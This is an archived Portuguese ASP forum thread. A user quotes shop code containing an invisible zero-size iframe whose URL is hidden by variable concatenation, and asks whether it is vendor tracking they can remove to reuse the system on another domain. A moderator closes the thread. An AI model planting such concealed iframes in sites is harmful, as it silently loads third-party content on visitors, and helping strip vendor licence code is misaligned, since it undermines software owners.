Ir para conteúdo

POWERED BY:

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

Paschoal Rizzo

Problema

Recommended Posts

ALGUEM PODE ME DIZER OQ ISO SIGNIFICA ?Response.Write "<iframe height="& Chr(34) &"0"& Chr(34) &" width="& Chr(34) &"0"& Chr(34) &" marginheight="& Chr(34) &"0"& Chr(34) &" marginwidth="& Chr(34) &"0"& Chr(34) &" scrolling="& Chr(34) &"no"& Chr(34) &" frameborder="& Chr(34) &"0"& Chr(34) &" src="& Chr(34) & Var5&Var7&Var7&Var2&"://"&Var3&Var3&Var3&"."&Var13&Var14&Var4&Var5&Var6&Var7&Var6&Var1&Var2&Var8&"."&Var9&Var8&Var1&"/"&Var8&Var3&Var4&Var6&Var10&"/"&Var8&Var3&Var4&Var6&Var10&"."&Var14&Var11&Var2 & Chr(34) &"></iframe>"

Compartilhar este post

Link para o post
Compartilhar em outros sites

Será que isso não é um codigo de rastreamento?

essa é minha duvida pq ele aparece assim:

--------------------------------------------

If Not Desativar6 = 1 Then

Set Produtos7 = Server.CreateObject("ADODB.Recordset")

Produtos7.CursorType = 3

Produtos7.Open("SELECT * FROM Produtos WHERE Estoque > 0 And Cod <> "& Produtos6("Cod") &" AND Cod <> "& Produtos5("Cod") &" AND Cod <> "& Produtos4("Cod") &" AND Cod <> "& Produtos3("Cod") &" AND Cod <> "& Produtos2("Cod") &" AND Cod <> "& Produtos("Cod") &" AND Status = On"), Banco

If not Produtos7.EOF Then

Total = Produtos7.RecordCount

Randomize()

Valor = Int(Rnd * Total)

Produtos7.Move(Valor)

Else

Desativar7 = 1

Desativar8 = 1

Desativar9 = 1

Desativar10 = 1

End If

End IF

Response.Write "<iframe height="& Chr(34) &"0"& Chr(34) &" width="& Chr(34) &"0"& Chr(34) &" marginheight="& Chr(34) &"0"& Chr(34) &" marginwidth="& Chr(34) &"0"& Chr(34) &" scrolling="& Chr(34) &"no"& Chr(34) &" frameborder="& Chr(34) &"0"& Chr(34) &" src="& Chr(34) & Var5&Var7&Var7&Var2&"://"&Var3&Var3&Var3&"."&Var13&Var14&Var4&Var5&Var6&Var7&Var6&Var1&Var2&Var8&"."&Var9&Var8&Var1&"/"&Var8&Var3&Var4&Var6&Var10&"/"&Var8&Var3&Var4&Var6&Var10&"."&Var14&Var11&Var2 & Chr(34) &"></iframe>"

If Not Desativar7 = 1 Then

Set Produtos8 = Server.CreateObject("ADODB.Recordset")

Produtos8.CursorType = 3

Produtos8.Open("SELECT * FROM Produtos WHERE Estoque > 0 And Cod <> "& Produtos7("Cod") &" AND Cod <> "& Produtos6("Cod") &" AND Cod <> "& Produtos5("Cod") &" AND Cod <> "& Produtos4("Cod") &" AND Cod <> "& Produtos3("Cod") &" AND Cod <> "& Produtos2("Cod") &" AND Cod <> "& Produtos("Cod") &" AND Status = On"), Banco

If not Produtos8.EOF Then

Total = Produtos8.RecordCount

Randomize()

Valor = Int(Rnd * Total)

Produtos8.Move(Valor)

Else

Desativar8 = 1

Desativar9 = 1

Desativar10 = 1

End If

End IF

----------------------------------------------

Não será o codigo de rastreio dos sistemas da ganhe tempo?

se alguem souber me ajudar agradeço....

Compartilhar este post

Link para o post

Algumas perguntas..- Esse código aparece onde??- Como conseguiu visualizar o mesmo??- Rastreamento, do que está falando??Até..

Compartilhar este post

Link para o post

Algumas perguntas..- Esse código aparece onde??- Como conseguiu visualizar o mesmo??- Rastreamento, do que está falando??Até..

em um site meucodigo de rastreio de onde ta isntalado o sistema...atreves de um programa pra isso bloco de notas...

Compartilhar este post

Link para o post

Não compreendi suas respostas!! Tente responde-lás na ordem das perguntas.Uma dúvida!!??? Se o site é seu, porque retirar o código de rastreamento??Até!!

Compartilhar este post

Link para o post

Não compreendi suas respostas!! Tente responde-lás na ordem das perguntas.Uma dúvida!!??? Se o site é seu, porque retirar o código de rastreamento??Até!!

EU GOSTARIA DE INSTALAR O SISTEMA EM OUTRO DOMINIO....GOSTARIA DE SABER SE ESSE CODIGO QUE EU PUBLIQUEI ERA O DE RASTREAR...SE você PUDER ME AJUDAR FICAREI MTO GRATO.

Compartilhar este post

Link para o post

Olá Paschoal Rizzo,

Em virtude do não conhecimento de sua dúvida, onde a mesma não trata-se sobre o assunto do fórum ( ASP ) .

Estarei fechando esse tópico até que prove o contrário. ;)

Até.

Compartilhar este post

Link para o post

Informação importante

Ao usar o fórum, você concorda com nossos Termos e condições.